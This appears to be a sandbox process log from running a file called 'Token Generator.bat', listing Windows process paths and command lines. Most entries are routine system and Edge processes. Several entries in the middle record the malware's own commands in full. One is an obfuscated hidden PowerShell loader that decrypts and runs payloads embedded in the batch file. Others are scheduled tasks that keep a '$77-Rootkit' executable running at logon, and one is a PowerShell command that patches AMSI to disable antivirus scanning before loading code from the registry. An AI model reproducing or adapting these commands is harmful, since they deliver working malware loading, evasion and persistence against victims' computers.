"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_33_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_33.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_33.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_33.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_33.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_33.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\Token Generator.exe

"C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RZldNxyYcDAh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DfzhPwccRrtCPB,[Parameter(Position=1)][Type]$JOvLQwFUeu)$vpPaKRwfUqx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'ed'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'','C'+'l'+''+'a'+''+[Char](115)+'s,'+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+','+'A'+''+[Char](117)+''+'t'+'oC'+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$vpPaKRwfUqx.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DfzhPwccRrtCPB).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$vpPaKRwfUqx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'ke',''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l',$JOvLQwFUeu,$DfzhPwccRrtCPB).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $vpPaKRwfUqx.CreateType();}$NIEcYkjPoXXZX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$hTxEXVpSnAdOgm=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZuhxFHMbdzbhQEOxywe=RZldNxyYcDAh @([String])([IntPtr]);$xOBkisexqIgllhKcpvOyTu=RZldNxyYcDAh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sdqnmrdbkMl=$NIEcYkjPoXXZX.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$DnxXOCIdcRsLJM=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'ra'+'r'+''+'y'+''+'A'+'')));$PXvyitvJGJWSlQVDy=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$sdqnmrdbkMl,[Object](''+'V'+'irt'+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$FOdXqHa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DnxXOCIdcRsLJM,$ZuhxFHMbdzbhQEOxywe).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$AoyFSQZKZeOCvfnrl=$hTxEXVpSnAdOgm.Invoke($Null,@([Object]$FOdXqHa,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$lrXFsIyBpf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,4,[ref]$lrXFsIyBpf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AoyFSQZKZeOCvfnrl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PXvyitvJGJWSlQVDy,$xOBkisexqIgllhKcpvOyTu).Invoke($AoyFSQZKZeOCvfnrl,[uint32]8,0x20,[ref]$lrXFsIyBpf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{eabfa77e-2b59-44a3-9a8e-cd43c8bcccb3}

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd65cb46f8,0x7ffd65cb4708,0x7ffd65cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2288 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 1d679715d5407b760285820cf4763357 9tEy7hausUWQgnbhTvmrsA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3588 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

